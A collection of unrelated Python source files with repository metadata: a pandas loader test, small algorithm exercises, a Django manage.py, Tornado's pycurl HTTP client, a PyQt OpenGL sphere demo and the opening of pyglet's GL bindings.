self.assertDataFrameEqual(loaded['iris'], dframe)
dframe = pd.read_csv(**self.expected_specs['person_activity'])
self.assertDataFrameEqual(loaded['person_activity'], dframe)
dframes = [pd.read_csv(**args) for args in
self.expected_specs['multi_iris']]
dframes = [x.drop_duplicates() for x in dframes]
dframe = pd.concat(dframes)
dframe.set_index(np.arange(dframe.shape[0]), inplace=True)
self.assertDataFrameEqual(loaded['multi_iris'], dframe)
def test_dataset_colnames(self):
"""Check if the column names read by the Loader are correct."""
for name, sep in {'iris': ',', 'person_activity': '\t'}.iteritems():
loaded = self.project.load_dataset(name)
columns = loaded.columns.tolist()
spec_colnames = colnames(self.data_specs[name]['path'], sep=sep)
self.assertItemsEqual(spec_colnames, columns)
def test_dataset_coltypes(self):
"""Check whether the columns have the correct datatypes."""
for name in ['iris', 'person_activity']:
loaded = self.project.load_dataset(name)
for colname in loaded:
if loaded[colname].dtype == np.dtype('O'):
self.assertEqual(self.data_specs[name]['dtypes'][colname],
str)
elif loaded[colname].dtype == np.dtype('<M8[ns]'):
self.assertIn(colname, self.data_specs[name]['parse_dates'])
else:
self.assertEqual(loaded[colname].dtype,
self.data_specs[name]['dtypes'][colname])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
643eb7f477425f02153c3d2c8d108744da4cae8e | 52cb25dca22292fce4d3907cc370098d7a57fcc2 | /BAEKJOON/1차원배열/10818_최소, 최대.py | 86667a7ec7f8aea5cf57f1648b87a1660e4cd302 | [] | no_license | shjang1013/Algorithm | c4fc4c52cbbd3b7ecf063c716f600d1dbfc40d1a | 33f2caa6339afc6fc53ea872691145effbce0309 | refs/heads/master | 2022-09-16T12:02:53.146884 | 2022-08-31T16:29:04 | 2022-08-31T16:29:04 | 227,843,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | num = int(input())
test_case = list(map(int, input().split()))
print('{0} {1}'.format(min(test_case), max(test_case)))
| [
"[email protected]"
] | |
74df909a3eadb0de7ee6075b1ba1e97fbaab5606 | 0e726928cc61cc4b140bb81e4187f7588cba1622 | /manage.py | 0cb7605ed6afbf33322846dd0c1d656b02edac5a | [] | no_license | LeoKnox/djangoadv1 | 7a76652b4f59174b31f36f2b2f65662cdf17f05e | 82f5eb82728ec539a725a1460e387cd195af872e | refs/heads/main | 2022-12-28T23:26:55.682230 | 2020-10-17T22:22:52 | 2020-10-17T22:22:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_adv.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
655ca34106da480d21ec9bb6da7b33271375ad14 | a56a74b362b9263289aad96098bd0f7d798570a2 | /venv/lib/python3.8/site-packages/tornado/curl_httpclient.py | b81316c01b086b4136ec914a0494b394529a1c69 | [
"MIT"
] | permissive | yoonkt200/ml-theory-python | 5812d06841d30e1068f6592b5730a40e87801313 | 7643136230fd4f291b6e3dbf9fa562c3737901a2 | refs/heads/master | 2022-12-21T14:53:21.624453 | 2021-02-02T09:33:07 | 2021-02-02T09:33:07 | 132,319,537 | 13 | 14 | MIT | 2022-12-19T17:23:57 | 2018-05-06T08:17:45 | Python | UTF-8 | Python | false | false | 24,693 | py | #
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Non-blocking HTTP client implementation using pycurl."""
import collections
import functools
import logging
import pycurl # type: ignore
import threading
import time
from io import BytesIO
from tornado import httputil
from tornado import ioloop
from tornado.escape import utf8, native_str
from tornado.httpclient import (
HTTPRequest,
HTTPResponse,
HTTPError,
AsyncHTTPClient,
main,
)
from tornado.log import app_log
from typing import Dict, Any, Callable, Union
import typing
if typing.TYPE_CHECKING:
from typing import Deque, Tuple, Optional # noqa: F401
curl_log = logging.getLogger("tornado.curl_httpclient")
class CurlAsyncHTTPClient(AsyncHTTPClient):
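    """``AsyncHTTPClient`` implementation based on ``pycurl``.

    The standard way to select this implementation is via the
    ``AsyncHTTPClient`` factory::

        from tornado.httpclient import AsyncHTTPClient
        AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
        http_client = AsyncHTTPClient()
    """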
def initialize( # type: ignore
self, max_clients: int = 10, defaults: Dict[str, Any] = None
) -> None:
super(CurlAsyncHTTPClient, self).initialize(defaults=defaults)
self._multi = pycurl.CurlMulti()
self._multi.setopt(pycurl.M_TIMERFUNCTION, self._set_timeout)
self._multi.setopt(pycurl.M_SOCKETFUNCTION, self._handle_socket)
self._curls = [self._curl_create() for i in range(max_clients)]
self._free_list = self._curls[:]
self._requests = (
collections.deque()
) # type: Deque[Tuple[HTTPRequest, Callable[[HTTPResponse], None], float]]
self._fds = {} # type: Dict[int, int]
self._timeout = None # type: Optional[object]
# libcurl has bugs that sometimes cause it to not report all
# relevant file descriptors and timeouts to TIMERFUNCTION/
# SOCKETFUNCTION. Mitigate the effects of such bugs by
# forcing a periodic scan of all active requests.
self._force_timeout_callback = ioloop.PeriodicCallback(
self._handle_force_timeout, 1000
)
self._force_timeout_callback.start()
# Work around a bug in libcurl 7.29.0: Some fields in the curl
# multi object are initialized lazily, and its destructor will
# segfault if it is destroyed without having been used. Add
# and remove a dummy handle to make sure everything is
# initialized.
dummy_curl_handle = pycurl.Curl()
self._multi.add_handle(dummy_curl_handle)
self._multi.remove_handle(dummy_curl_handle)
def close(self) -> None:
self._force_timeout_callback.stop()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
for curl in self._curls:
curl.close()
self._multi.close()
super(CurlAsyncHTTPClient, self).close()
        # Set the properties below to None to reduce the reference count of the
        # current instance, because those properties hold some methods of the
        # current instance that would otherwise cause a circular reference.
self._force_timeout_callback = None # type: ignore
self._multi = None
def fetch_impl(
self, request: HTTPRequest, callback: Callable[[HTTPResponse], None]
) -> None:
self._requests.append((request, callback, self.io_loop.time()))
self._process_queue()
self._set_timeout(0)
def _handle_socket(self, event: int, fd: int, multi: Any, data: bytes) -> None:
"""Called by libcurl when it wants to change the file descriptors
it cares about.
"""
event_map = {
pycurl.POLL_NONE: ioloop.IOLoop.NONE,
pycurl.POLL_IN: ioloop.IOLoop.READ,
pycurl.POLL_OUT: ioloop.IOLoop.WRITE,
pycurl.POLL_INOUT: ioloop.IOLoop.READ | ioloop.IOLoop.WRITE,
}
if event == pycurl.POLL_REMOVE:
if fd in self._fds:
self.io_loop.remove_handler(fd)
del self._fds[fd]
else:
ioloop_event = event_map[event]
# libcurl sometimes closes a socket and then opens a new
# one using the same FD without giving us a POLL_NONE in
# between. This is a problem with the epoll IOLoop,
# because the kernel can tell when a socket is closed and
# removes it from the epoll automatically, causing future
# update_handler calls to fail. Since we can't tell when
# this has happened, always use remove and re-add
# instead of update.
if fd in self._fds:
self.io_loop.remove_handler(fd)
self.io_loop.add_handler(fd, self._handle_events, ioloop_event)
self._fds[fd] = ioloop_event
def _set_timeout(self, msecs: int) -> None:
"""Called by libcurl to schedule a timeout."""
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = self.io_loop.add_timeout(
self.io_loop.time() + msecs / 1000.0, self._handle_timeout
)
def _handle_events(self, fd: int, events: int) -> None:
"""Called by IOLoop when there is activity on one of our
file descriptors.
"""
action = 0
if events & ioloop.IOLoop.READ:
action |= pycurl.CSELECT_IN
if events & ioloop.IOLoop.WRITE:
action |= pycurl.CSELECT_OUT
while True:
try:
ret, num_handles = self._multi.socket_action(fd, action)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _handle_timeout(self) -> None:
"""Called by IOLoop when the requested timeout has passed."""
self._timeout = None
while True:
try:
ret, num_handles = self._multi.socket_action(pycurl.SOCKET_TIMEOUT, 0)
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
# In theory, we shouldn't have to do this because curl will
# call _set_timeout whenever the timeout changes. However,
# sometimes after _handle_timeout we will need to reschedule
# immediately even though nothing has changed from curl's
# perspective. This is because when socket_action is
# called with SOCKET_TIMEOUT, libcurl decides internally which
# timeouts need to be processed by using a monotonic clock
# (where available) while tornado uses python's time.time()
# to decide when timeouts have occurred. When those clocks
# disagree on elapsed time (as they will whenever there is an
# NTP adjustment), tornado might call _handle_timeout before
# libcurl is ready. After each timeout, resync the scheduled
# timeout with libcurl's current state.
new_timeout = self._multi.timeout()
if new_timeout >= 0:
self._set_timeout(new_timeout)
def _handle_force_timeout(self) -> None:
"""Called by IOLoop periodically to ask libcurl to process any
events it may have forgotten about.
"""
while True:
try:
ret, num_handles = self._multi.socket_all()
except pycurl.error as e:
ret = e.args[0]
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
self._finish_pending_requests()
def _finish_pending_requests(self) -> None:
"""Process any requests that were completed by the last
call to multi.socket_action.
"""
while True:
num_q, ok_list, err_list = self._multi.info_read()
for curl in ok_list:
self._finish(curl)
for curl, errnum, errmsg in err_list:
self._finish(curl, errnum, errmsg)
if num_q == 0:
break
self._process_queue()
def _process_queue(self) -> None:
while True:
started = 0
while self._free_list and self._requests:
started += 1
curl = self._free_list.pop()
(request, callback, queue_start_time) = self._requests.popleft()
curl.info = {
"headers": httputil.HTTPHeaders(),
"buffer": BytesIO(),
"request": request,
"callback": callback,
"queue_start_time": queue_start_time,
"curl_start_time": time.time(),
"curl_start_ioloop_time": self.io_loop.current().time(),
}
try:
self._curl_setup_request(
curl, request, curl.info["buffer"], curl.info["headers"]
)
except Exception as e:
# If there was an error in setup, pass it on
# to the callback. Note that allowing the
# error to escape here will appear to work
# most of the time since we are still in the
# caller's original stack frame, but when
# _process_queue() is called from
# _finish_pending_requests the exceptions have
# nowhere to go.
self._free_list.append(curl)
callback(HTTPResponse(request=request, code=599, error=e))
else:
self._multi.add_handle(curl)
if not started:
break
    def _finish(
        self,
        curl: pycurl.Curl,
        curl_error: Optional[int] = None,
        curl_message: Optional[str] = None,
    ) -> None:
info = curl.info
curl.info = None
self._multi.remove_handle(curl)
self._free_list.append(curl)
buffer = info["buffer"]
if curl_error:
assert curl_message is not None
error = CurlError(curl_error, curl_message) # type: Optional[CurlError]
assert error is not None
code = error.code
effective_url = None
buffer.close()
buffer = None
else:
error = None
code = curl.getinfo(pycurl.HTTP_CODE)
effective_url = curl.getinfo(pycurl.EFFECTIVE_URL)
buffer.seek(0)
# the various curl timings are documented at
# http://curl.haxx.se/libcurl/c/curl_easy_getinfo.html
time_info = dict(
queue=info["curl_start_ioloop_time"] - info["queue_start_time"],
namelookup=curl.getinfo(pycurl.NAMELOOKUP_TIME),
connect=curl.getinfo(pycurl.CONNECT_TIME),
appconnect=curl.getinfo(pycurl.APPCONNECT_TIME),
pretransfer=curl.getinfo(pycurl.PRETRANSFER_TIME),
starttransfer=curl.getinfo(pycurl.STARTTRANSFER_TIME),
total=curl.getinfo(pycurl.TOTAL_TIME),
redirect=curl.getinfo(pycurl.REDIRECT_TIME),
)
try:
info["callback"](
HTTPResponse(
request=info["request"],
code=code,
headers=info["headers"],
buffer=buffer,
effective_url=effective_url,
error=error,
reason=info["headers"].get("X-Http-Reason", None),
request_time=self.io_loop.time() - info["curl_start_ioloop_time"],
start_time=info["curl_start_time"],
time_info=time_info,
)
)
except Exception:
self.handle_callback_exception(info["callback"])
def handle_callback_exception(self, callback: Any) -> None:
app_log.error("Exception in callback %r", callback, exc_info=True)
def _curl_create(self) -> pycurl.Curl:
curl = pycurl.Curl()
if curl_log.isEnabledFor(logging.DEBUG):
curl.setopt(pycurl.VERBOSE, 1)
curl.setopt(pycurl.DEBUGFUNCTION, self._curl_debug)
if hasattr(
pycurl, "PROTOCOLS"
): # PROTOCOLS first appeared in pycurl 7.19.5 (2014-07-12)
curl.setopt(pycurl.PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
curl.setopt(pycurl.REDIR_PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
return curl
def _curl_setup_request(
self,
curl: pycurl.Curl,
request: HTTPRequest,
buffer: BytesIO,
headers: httputil.HTTPHeaders,
) -> None:
curl.setopt(pycurl.URL, native_str(request.url))
# libcurl's magic "Expect: 100-continue" behavior causes delays
# with servers that don't support it (which include, among others,
# Google's OpenID endpoint). Additionally, this behavior has
# a bug in conjunction with the curl_multi_socket_action API
# (https://sourceforge.net/tracker/?func=detail&atid=100976&aid=3039744&group_id=976),
# which increases the delays. It's more trouble than it's worth,
# so just turn off the feature (yes, setting Expect: to an empty
# value is the official way to disable this)
if "Expect" not in request.headers:
request.headers["Expect"] = ""
# libcurl adds Pragma: no-cache by default; disable that too
if "Pragma" not in request.headers:
request.headers["Pragma"] = ""
curl.setopt(
pycurl.HTTPHEADER,
[
"%s: %s" % (native_str(k), native_str(v))
for k, v in request.headers.get_all()
],
)
curl.setopt(
pycurl.HEADERFUNCTION,
functools.partial(
self._curl_header_callback, headers, request.header_callback
),
)
if request.streaming_callback:
def write_function(b: Union[bytes, bytearray]) -> int:
assert request.streaming_callback is not None
self.io_loop.add_callback(request.streaming_callback, b)
return len(b)
else:
write_function = buffer.write
curl.setopt(pycurl.WRITEFUNCTION, write_function)
curl.setopt(pycurl.FOLLOWLOCATION, request.follow_redirects)
curl.setopt(pycurl.MAXREDIRS, request.max_redirects)
assert request.connect_timeout is not None
curl.setopt(pycurl.CONNECTTIMEOUT_MS, int(1000 * request.connect_timeout))
assert request.request_timeout is not None
curl.setopt(pycurl.TIMEOUT_MS, int(1000 * request.request_timeout))
if request.user_agent:
curl.setopt(pycurl.USERAGENT, native_str(request.user_agent))
else:
curl.setopt(pycurl.USERAGENT, "Mozilla/5.0 (compatible; pycurl)")
if request.network_interface:
curl.setopt(pycurl.INTERFACE, request.network_interface)
if request.decompress_response:
curl.setopt(pycurl.ENCODING, "gzip,deflate")
else:
curl.setopt(pycurl.ENCODING, "none")
if request.proxy_host and request.proxy_port:
curl.setopt(pycurl.PROXY, request.proxy_host)
curl.setopt(pycurl.PROXYPORT, request.proxy_port)
if request.proxy_username:
assert request.proxy_password is not None
credentials = httputil.encode_username_password(
request.proxy_username, request.proxy_password
)
curl.setopt(pycurl.PROXYUSERPWD, credentials)
if request.proxy_auth_mode is None or request.proxy_auth_mode == "basic":
curl.setopt(pycurl.PROXYAUTH, pycurl.HTTPAUTH_BASIC)
elif request.proxy_auth_mode == "digest":
curl.setopt(pycurl.PROXYAUTH, pycurl.HTTPAUTH_DIGEST)
else:
raise ValueError(
"Unsupported proxy_auth_mode %s" % request.proxy_auth_mode
)
else:
curl.setopt(pycurl.PROXY, "")
curl.unsetopt(pycurl.PROXYUSERPWD)
if request.validate_cert:
curl.setopt(pycurl.SSL_VERIFYPEER, 1)
curl.setopt(pycurl.SSL_VERIFYHOST, 2)
else:
curl.setopt(pycurl.SSL_VERIFYPEER, 0)
curl.setopt(pycurl.SSL_VERIFYHOST, 0)
if request.ca_certs is not None:
curl.setopt(pycurl.CAINFO, request.ca_certs)
else:
# There is no way to restore pycurl.CAINFO to its default value
# (Using unsetopt makes it reject all certificates).
# I don't see any way to read the default value from python so it
# can be restored later. We'll have to just leave CAINFO untouched
# if no ca_certs file was specified, and require that if any
# request uses a custom ca_certs file, they all must.
pass
if request.allow_ipv6 is False:
# Curl behaves reasonably when DNS resolution gives an ipv6 address
# that we can't reach, so allow ipv6 unless the user asks to disable.
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_V4)
else:
curl.setopt(pycurl.IPRESOLVE, pycurl.IPRESOLVE_WHATEVER)
# Set the request method through curl's irritating interface which makes
# up names for almost every single method
curl_options = {
"GET": pycurl.HTTPGET,
"POST": pycurl.POST,
"PUT": pycurl.UPLOAD,
"HEAD": pycurl.NOBODY,
}
custom_methods = set(["DELETE", "OPTIONS", "PATCH"])
for o in curl_options.values():
curl.setopt(o, False)
if request.method in curl_options:
curl.unsetopt(pycurl.CUSTOMREQUEST)
curl.setopt(curl_options[request.method], True)
elif request.allow_nonstandard_methods or request.method in custom_methods:
curl.setopt(pycurl.CUSTOMREQUEST, request.method)
else:
raise KeyError("unknown method " + request.method)
body_expected = request.method in ("POST", "PATCH", "PUT")
body_present = request.body is not None
if not request.allow_nonstandard_methods:
# Some HTTP methods nearly always have bodies while others
# almost never do. Fail in this case unless the user has
# opted out of sanity checks with allow_nonstandard_methods.
if (body_expected and not body_present) or (
body_present and not body_expected
):
raise ValueError(
"Body must %sbe None for method %s (unless "
"allow_nonstandard_methods is true)"
% ("not " if body_expected else "", request.method)
)
if body_expected or body_present:
if request.method == "GET":
# Even with `allow_nonstandard_methods` we disallow
# GET with a body (because libcurl doesn't allow it
# unless we use CUSTOMREQUEST). While the spec doesn't
# forbid clients from sending a body, it arguably
# disallows the server from doing anything with them.
raise ValueError("Body must be None for GET request")
request_buffer = BytesIO(utf8(request.body or ""))
def ioctl(cmd: int) -> None:
if cmd == curl.IOCMD_RESTARTREAD:
request_buffer.seek(0)
curl.setopt(pycurl.READFUNCTION, request_buffer.read)
curl.setopt(pycurl.IOCTLFUNCTION, ioctl)
if request.method == "POST":
curl.setopt(pycurl.POSTFIELDSIZE, len(request.body or ""))
else:
curl.setopt(pycurl.UPLOAD, True)
curl.setopt(pycurl.INFILESIZE, len(request.body or ""))
if request.auth_username is not None:
assert request.auth_password is not None
if request.auth_mode is None or request.auth_mode == "basic":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
elif request.auth_mode == "digest":
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_DIGEST)
else:
raise ValueError("Unsupported auth_mode %s" % request.auth_mode)
userpwd = httputil.encode_username_password(
request.auth_username, request.auth_password
)
curl.setopt(pycurl.USERPWD, userpwd)
curl_log.debug(
"%s %s (username: %r)",
request.method,
request.url,
request.auth_username,
)
else:
curl.unsetopt(pycurl.USERPWD)
curl_log.debug("%s %s", request.method, request.url)
if request.client_cert is not None:
curl.setopt(pycurl.SSLCERT, request.client_cert)
if request.client_key is not None:
curl.setopt(pycurl.SSLKEY, request.client_key)
if request.ssl_options is not None:
raise ValueError("ssl_options not supported in curl_httpclient")
if threading.active_count() > 1:
# libcurl/pycurl is not thread-safe by default. When multiple threads
# are used, signals should be disabled. This has the side effect
# of disabling DNS timeouts in some environments (when libcurl is
# not linked against ares), so we don't do it when there is only one
# thread. Applications that use many short-lived threads may need
# to set NOSIGNAL manually in a prepare_curl_callback since
# there may not be any other threads running at the time we call
# threading.activeCount.
curl.setopt(pycurl.NOSIGNAL, 1)
if request.prepare_curl_callback is not None:
request.prepare_curl_callback(curl)
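    # A hypothetical prepare_curl_callback sketch (not part of this module):
    # per the NOSIGNAL comment above, an application that uses many
    # short-lived threads could force NOSIGNAL itself on every request.
    #
    #     def _force_nosignal(curl: pycurl.Curl) -> None:
    #         curl.setopt(pycurl.NOSIGNAL, 1)
    #
    #     HTTPRequest(url, prepare_curl_callback=_force_nosignal)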
def _curl_header_callback(
self,
headers: httputil.HTTPHeaders,
header_callback: Callable[[str], None],
header_line_bytes: bytes,
) -> None:
header_line = native_str(header_line_bytes.decode("latin1"))
if header_callback is not None:
self.io_loop.add_callback(header_callback, header_line)
# header_line as returned by curl includes the end-of-line characters.
# whitespace at the start should be preserved to allow multi-line headers
header_line = header_line.rstrip()
if header_line.startswith("HTTP/"):
headers.clear()
try:
(__, __, reason) = httputil.parse_response_start_line(header_line)
header_line = "X-Http-Reason: %s" % reason
except httputil.HTTPInputError:
return
if not header_line:
return
headers.parse_line(header_line)
def _curl_debug(self, debug_type: int, debug_msg: str) -> None:
debug_types = ("I", "<", ">", "<", ">")
if debug_type == 0:
debug_msg = native_str(debug_msg)
curl_log.debug("%s", debug_msg.strip())
elif debug_type in (1, 2):
debug_msg = native_str(debug_msg)
for line in debug_msg.splitlines():
curl_log.debug("%s %s", debug_types[debug_type], line)
elif debug_type == 4:
curl_log.debug("%s %r", debug_types[debug_type], debug_msg)
class CurlError(HTTPError):
def __init__(self, errno: int, message: str) -> None:
HTTPError.__init__(self, 599, message)
self.errno = errno
if __name__ == "__main__":
AsyncHTTPClient.configure(CurlAsyncHTTPClient)
main()
"""
moveSphere.py

This program allows the user to move a sphere to demonstrate
distortion at the edges of the viewing frustum.

Interaction:
    Press the arrow keys to move the sphere.
    Press the space bar to rotate the sphere.
    Press r to reset.
"""
from PyQt5 import QtWidgets, QtCore, QtGui, QtOpenGL
from OpenGL.GL import *
import math as m
# Co-ordinates of the sphere center.
Xvalue = 0.0
Yvalue = 0.0
Angle = 0.0  # Angle to rotate the sphere.
def myWireSphere(r: float, nParal: int, nMerid: int):
    """Draw a wireframe sphere of radius r with nParal parallels and nMerid meridians."""
    # Parallels: circles of constant latitude j, at height y = r*cos(j)
    # and radius r*sin(j).
    j = 0
    while j < m.pi:
        glBegin(GL_LINE_LOOP)
        y = r * m.cos(j)
        i = 0
        while i < 2 * m.pi:
            x = r * m.cos(i) * m.sin(j)
            z = r * m.sin(i) * m.sin(j)
            glVertex3f(x, y, z)
            i += m.pi / 60
        glEnd()
        j += m.pi / (nParal + 1)
    # Meridians: great circles through the poles, rotated about the y axis
    # by longitude j.
    j = 0
    while j < m.pi:
        glBegin(GL_LINE_LOOP)
        i = 0
        while i < 2 * m.pi:
            x = r * m.sin(i) * m.cos(j)
            y = r * m.cos(i)
            z = r * m.sin(j) * m.sin(i)
            glVertex3f(x, y, z)
            i += m.pi / 60
        glEnd()
        j += m.pi / nMerid
class MyWidget(QtWidgets.QOpenGLWidget):
def __init__(self):
super().__init__()
self.setFixedSize(500,500)
def initializeGL(self) -> None:
glClearColor(1.0, 1.0, 1.0, 0.0)
def paintGL(self) -> None:
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
        # Set the position of the sphere.
glTranslatef(Xvalue, Yvalue, -5.0)
glRotatef(Angle, 1.0, 1.0, 1.0)
glColor3f(0.0, 0.0, 0.0)
myWireSphere(0.5, 16, 10)
glFlush()
def resizeGL(self, w: int, h: int) -> None:
glViewport(0, 0, w, h)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glFrustum(-1.0, 1.0, -1.0, 1.0, 1.5, 20.0)
glMatrixMode(GL_MODELVIEW)
def keyPressEvent(self, event: QtGui.QKeyEvent) -> None:
global Xvalue,Yvalue,Angle
if event.key() == QtCore.Qt.Key_R:
Xvalue = Yvalue = Angle = 0.0
self.update()
elif event.key() == QtCore.Qt.Key_Space:
Angle += 10.0
self.update()
elif event.key() == QtCore.Qt.Key_Up:
Yvalue += 0.1
self.update()
elif event.key() == QtCore.Qt.Key_Down:
Yvalue -= 0.1
self.update()
elif event.key() == QtCore.Qt.Key_Left:
Xvalue -= 0.1
self.update()
elif event.key() == QtCore.Qt.Key_Right:
Xvalue += 0.1
self.update()
if __name__ == '__main__':
app = QtWidgets.QApplication([])
win = MyWidget()
win.show()
    app.exec()
"""
Serialization is the process of converting a data structure or object into a sequence of bits so that it can be stored in a file or memory buffer,
or transmitted across a network connection to be reconstructed later in the same or another computer environment.
Design an algorithm to serialize and deserialize an N-ary tree. An N-ary tree is a rooted tree in which each node has no more than N children.
There is no restriction on how your serialization/deserialization algorithm should work.
You just need to ensure that an N-ary tree can be serialized to a string and this string can be deserialized to the original tree structure.
For example, you may serialize the following 3-ary tree as [1 [3[5 6] 2 4]].
You do not necessarily need to follow this format, so please be creative and come up with different approaches yourself.
Note:
1. N is in the range of [1, 1000]
2. Do not use class member/global/static variables to store states. Your serialize and deserialize algorithms should be stateless.
"""
class Node(object):
def __init__(self, val, children):
self.val = val
self.children = children
class Codec(object):
    def serialize(self, root):
        if root is None:
            return ""
        # str() of the nested-list encoding, with spaces and commas stripped
        # so only values and brackets remain, e.g. '[1[3[5[]][6[]]][2[]][4[]]]'.
        serialization = str(self.inorder_helper(root))
        res = ""
        for symbol in serialization:
            if symbol != " " and symbol != ",":
                res += symbol
        return res
def inorder_helper(self, node):
if not node.children:
return [node.val, []]
return [node.val] + [self.inorder_helper(child) for child in node.children]
    def deserialize(self, data):
        if not data:
            return None
        scanner = 0
        dummy_head = Node("dummy head", [])
        stack = [dummy_head]
        root = None
        while scanner < len(data):
            if data[scanner] == '[':
                # A '[' opens a child list; an immediately following ']'
                # is a leaf's empty child list and can be skipped in one step.
                scanner += 1
                if data[scanner] == ']':
                    scanner += 1
            elif data[scanner] in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
                # Read a (possibly multi-digit) value and attach the new
                # node as a child of the node on top of the stack.
                val = ""
                while data[scanner] in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']:
                    val += data[scanner]
                    scanner += 1
                node = Node(int(val), [])
                stack[-1].children.append(node)
                stack.append(node)
            else:
                # A ']' closes the subtree of the node on top of the stack;
                # the last node popped is the root.
                root = stack.pop()
                scanner += 1
        return root
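# A minimal round-trip sketch (assumed usage; the names below are local to
# this demo, not part of the problem's driver). The tree is the 3-ary example
# from the docstring: 1 -> [3 -> [5, 6], 2, 4].
if __name__ == "__main__":
    codec = Codec()
    tree = Node(1, [Node(3, [Node(5, []), Node(6, [])]),
                    Node(2, []),
                    Node(4, [])])
    encoded = codec.serialize(tree)   # '[1[3[5[]][6[]]][2[]][4[]]]'
    decoded = codec.deserialize(encoded)
    assert codec.serialize(decoded) == encoded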
"[email protected]"
] | |
3330ac47b8e263dc784e8adc5c51fdaaa3d8f3ed | 140929bb7a81dd76688d5acc923f28aa0ff539d8 | /env/lib/python3.6/site-packages/pyglet/gl/gl.py | 124e049934b4d7e17508d83139153ba74ef16da6 | [
"Apache-2.0"
] | permissive | boodahDEV/Soni-IA | bd4436895c6c61c191e8968a964667af174121cd | c452c0b3df3a3ced4b5027c2abb4f3c22fd0f948 | refs/heads/master | 2020-05-05T01:27:04.810504 | 2019-05-27T06:48:08 | 2019-05-27T06:48:08 | 179,603,282 | 2 | 1 | Apache-2.0 | 2019-05-27T06:38:43 | 2019-04-05T01:39:46 | Python | UTF-8 | Python | false | false | 134,082 | py | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Wrapper for /usr/include/GL/gl.h
Generated by tools/gengl.py.
Do not modify this file.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from ctypes import *
from pyglet.gl.lib import link_GL as _link_function
from pyglet.gl.lib import c_ptrdiff_t
# BEGIN GENERATED CONTENT (do not edit below this line)
# This content is generated by gengl.py.
# Wrapper for /usr/include/GL/gl.h
GL_VERSION_1_1 = 1 # /usr/include/GL/gl.h:140
GL_VERSION_1_2 = 1 # /usr/include/GL/gl.h:141
GL_VERSION_1_3 = 1 # /usr/include/GL/gl.h:142
GL_ARB_imaging = 1 # /usr/include/GL/gl.h:143
GLenum = c_uint # /usr/include/GL/gl.h:149
GLboolean = c_ubyte # /usr/include/GL/gl.h:150
GLbitfield = c_uint # /usr/include/GL/gl.h:151
GLvoid = None # /usr/include/GL/gl.h:152
GLbyte = c_char # /usr/include/GL/gl.h:153
GLshort = c_short # /usr/include/GL/gl.h:154
GLint = c_int # /usr/include/GL/gl.h:155
GLubyte = c_ubyte # /usr/include/GL/gl.h:156
GLushort = c_ushort # /usr/include/GL/gl.h:157
GLuint = c_uint # /usr/include/GL/gl.h:158
GLsizei = c_int # /usr/include/GL/gl.h:159
GLfloat = c_float # /usr/include/GL/gl.h:160
GLclampf = c_float # /usr/include/GL/gl.h:161
GLdouble = c_double # /usr/include/GL/gl.h:162
GLclampd = c_double # /usr/include/GL/gl.h:163
GL_FALSE = 0 # /usr/include/GL/gl.h:172
